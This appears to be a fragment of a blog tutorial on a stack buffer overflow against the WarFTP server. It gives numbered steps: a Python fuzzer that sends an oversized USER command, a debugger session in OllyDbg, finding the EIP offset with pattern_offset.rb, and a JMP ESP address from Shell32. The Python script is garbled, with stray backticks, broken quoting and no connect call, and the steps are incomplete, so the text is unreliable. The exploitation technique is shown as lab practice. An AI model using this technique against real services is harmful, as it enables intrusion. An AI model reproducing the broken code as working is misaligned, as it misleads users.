2. Type script python contained in the guide book
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer="\41"*1000
print("sendingevildata USER command...")
s.send(USER`+buffer+`\r\n`)
data=s.recv(1024)
s.send(`PASS PASSWORD`+`\r\n`)
s.close()
print("Finish")
3. Open application Ollydbg and open file warftp on ollydbg
4. Click Debug > run, and see result
5. open terminal, type nc 192.168.56.101 21
6. run pattern.txt
7. and result is code hexa, for ,ore detail click view
8. insert code to code on file have been made previously
9. type #./pattern_offset.rb Aq4Aq5A
10. after that, run warFTP again from the OllyDbg and start fuzzer. And the result is like this.I have success
to change register EIP.
11. Click menu Executable Modules
12 Using Shell32
13. input command JMP ESP
14. run warftp using OllyDbg and run script fuzzer. and result this.
15. open browser and type 127.0.0.1:55555
Tidak ada komentar:
Posting Komentar